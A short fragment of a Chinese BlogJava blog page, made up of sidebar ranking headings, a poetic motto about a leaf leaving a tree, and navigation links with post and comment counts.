閱讀排行榜

評論排行榜

酒水不犯茶水葉的離去，是風的追求還是樹的不挽留？
BlogJava \| 首頁 \| 發新隨筆 \| 發新文章 \| 聯系 \| 聚合 \| 管理	隨筆：325 文章：0 評論：612 引用：0